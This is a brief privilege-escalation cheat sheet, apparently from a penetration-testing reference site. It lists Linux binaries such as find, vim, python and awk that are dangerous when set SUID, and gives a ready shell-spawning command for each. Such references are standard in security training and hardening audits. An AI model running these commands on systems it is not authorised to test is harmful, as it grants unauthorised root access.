https://cheatsheet.haax.fr/linux-systems/privilege-escalation/suid/
Dangerous SUID Binaries to Look For
| Binary | Reason it's Dangerous | Exploit Idea |
|---|---|---|
/usr/bin/find |
Allows executing arbitrary commands via -exec |
find / -exec /bin/bash -p \; -quit |
/bin/bash |
If SUID, run with -p to retain root |
/bin/bash -p |
/bin/sh |
If symlink to bash, may work with -p |
/bin/sh -p |
/usr/bin/perl |
Perl can be used to spawn a shell | perl -e 'exec "/bin/bash";' |
/usr/bin/python |
Python can be used to spawn a shell | python -c 'import os; os.setuid(0); os.system("/bin/bash")' |
/usr/bin/env |
Can execute another binary | env /bin/bash -p |
/usr/bin/vim |
Can spawn shell with :!bash |
vim -c '!bash' |
/usr/bin/nmap |
Some versions have interactive shell | nmap --interactive |
/usr/bin/less |
If SUID, can be abused via !sh |
Inside less, press !sh |
/usr/bin/awk |
Can spawn shell | awk 'BEGIN {system("/bin/bash")}' |